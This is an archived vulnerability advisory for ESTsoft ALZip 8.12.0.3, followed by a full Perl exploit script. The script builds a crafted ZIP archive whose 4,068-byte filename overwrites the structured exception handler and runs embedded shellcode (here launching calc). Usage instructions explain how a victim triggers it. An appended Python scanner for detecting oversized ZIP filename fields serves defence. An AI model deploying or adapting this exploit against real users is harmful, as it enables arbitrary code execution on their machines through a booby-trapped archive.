source: https://www.securityfocus.com/bid/45917/info

ESTsoft ALZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

ESTsoft ALZip 8.12.0.3 is vulnerable; other versions may also be affected.

#
#
#[+]Exploit Title: Exploit Buffer Overflow AlZip(SEH)
#[+]Date: 01\19\2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.altools.com/al/downloads/alzip/ALZip812.exe
#[+]Version: 8.12.0.3
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#
#Note: For the exploit to work you have to run the program from DOS
#
#C:\> Exploit.pl exploit.zip
#
#In this case my Exploit Creates the zip file exploit.zip
#In the open ALZip Click "OPEN", pass the mouse over the specially crafted file and
#keep the mouse on top of the file, do not click on it, and wait; then BOOM APPEARS THE CALC
#
#Watch This Video: http://www.youtube.com/watch?v=PTV_tZinI6w
#

use strict;
use warnings;

system("cls");
system("color 4f");

sub USAGE
{
print q {
#############################################
#                                           #
#Exploit Buffer Overflow AlZip(SEH)         #
#C4SS!0 G0M3S                               #
#Louredo_@hotmail.com                       #
#Site http://www.invasao.com.br             #
#                                           #
#############################################

[+]Exploit: Exploit Buffer Overflow AlZip(SEH)
[+]Date: 01\\19\\2010
[+]Author: C4SS!0 G0M3S
[+]Home: http://www.invasao.com.br
[+]E-mail: Louredo_@hotmail.com
[+]Version: 8.12.0.3
[+]Impact: Critical

Note: Look at the Comments Above for More Information on How the Exploit Works
};
}

if($#ARGV!=0)
{
    USAGE;
    print "[-]Usage: $0 <File_Name>\n";
    print "[-]Example: $0 Exploit.zip\n";
    exit(0);
}

my $sploitfile=$ARGV[0];

# ZIP local file header ("PK\x03\x04")
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

# ZIP central directory header ("PK\x01\x02"); \xe4\x0f = 0x0fe4 = 4068-byte filename
my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

# ZIP end of central directory record ("PK\x05\x06"): one entry, directory size 0x1012, offset 0x1002
my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

USAGE;
print "[*]Identifying the Length Shellcode\n";
sleep(1);

my $shellcode =
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . #Shellcode WINEXEC CALC
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

# Filename payload: filler, overwritten SEH record, NOP sled, shellcode, padding to 4064 bytes, ".txt"
my $payload = "A" x 1060;
$payload .= "\xeb\x08\x90\x90";
$payload .= pack('V',0x61309258);
$payload .= "\x90" x 10;
$payload .= $shellcode;
print "[*]The length Shellcode:".length($shellcode)."\n";
sleep(1);
$payload .= "\x42" x (4064 - length($payload));
$payload=$payload.".txt";

my $evilzip = $ldf_header.$payload.
$cdf_header.$payload.
$eofcdf_header;

print "[*]Creating the File $ARGV[0]\n";
sleep(1);
open(FILE,">$sploitfile") or die("ERROR:$!");
binmode(FILE);   # raw bytes; prevents newline translation on Windows
print FILE $evilzip;
close(FILE);
print "[*]The File $ARGV[0] was Successfully Created\n";
sleep(1);
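Added here as a defensive counterpart, not part of the original exploit or of ALZip: a Python scanner that walks a ZIP's central directory (via the end-of-central-directory record) and flags entries whose filename-length field exceeds a sane bound, the field the crafted archive above sets to 0x0fe4 (4068 bytes). The constructed sample reproduces that header layout with plain filler in place of the payload; MAX_NAME = 260 is an assumed threshold, and the benign control archive is constructed with the standard zipfile module.

```python
import io
import struct
import zipfile

EOCD_SIG = 0x06054b50   # end of central directory record, "PK\x05\x06"
CDH_SIG = 0x02014b50    # central directory file header, "PK\x01\x02"
LFH_SIG = 0x04034b50    # local file header, "PK\x03\x04"
MAX_NAME = 260          # assumed threshold (Windows MAX_PATH); longer names are suspect

def parse_central_directory(data: bytes):
    """Yield (name_length, name) for each central directory entry, following
    the EOCD record's entry count and offset instead of trusting local headers."""
    eocd = data.rfind(struct.pack('<I', EOCD_SIG))
    if eocd < 0 or eocd + 22 > len(data):
        raise ValueError("no end-of-central-directory record")
    entries, _cd_size, cd_off = struct.unpack_from('<IHHHHIIH', data, eocd)[4:7]
    off = cd_off
    for _ in range(entries):
        if off + 46 > len(data) or struct.unpack_from('<I', data, off)[0] != CDH_SIG:
            raise ValueError(f"bad central directory entry at offset {off:#x}")
        fields = struct.unpack_from('<IHHHHHHIIIHHHHHII', data, off)
        name_len, extra_len, comment_len = fields[10:13]
        yield name_len, data[off + 46:off + 46 + name_len]
        off += 46 + name_len + extra_len + comment_len

def oversized_names(data: bytes, limit: int = MAX_NAME) -> list:
    """Return the filename lengths of entries longer than `limit`."""
    return [n for n, _ in parse_central_directory(data) if n > limit]

def crafted_sample(name: bytes) -> bytes:
    """Constructed archive mirroring the exploit's layout: one stored, empty entry
    whose filename-length field is len(name) in the central directory header."""
    lfh = struct.pack('<IHHHHHIIIHH', LFH_SIG, 20, 0, 0, 0, 0, 0, 0, 0, len(name), 0) + name
    cdh = struct.pack('<IHHHHHHIIIHHHHHII', CDH_SIG, 20, 20, 0, 0, 0, 0,
                      0, 0, 0, len(name), 0, 0, 0, 1, 0x24, 0) + name
    eocd = struct.pack('<IHHHHIIH', EOCD_SIG, 0, 0, 1, 1, len(cdh), len(lfh), 0)
    return lfh + cdh + eocd

def benign_sample() -> bytes:
    """Constructed control: a normal single-file archive written by zipfile."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr('notes.txt', 'hello')
    return buf.getvalue()

if __name__ == '__main__':
    # 4064 filler bytes + ".txt" = 4068 = 0x0fe4, the length the exploit's header announces
    print(oversized_names(crafted_sample(b'A' * 4064 + b'.txt')))  # [4068]
    print(oversized_names(benign_sample()))                         # []
```

Because the check reads the central directory rather than each entry's local header, it also catches archives whose two headers disagree about the name length.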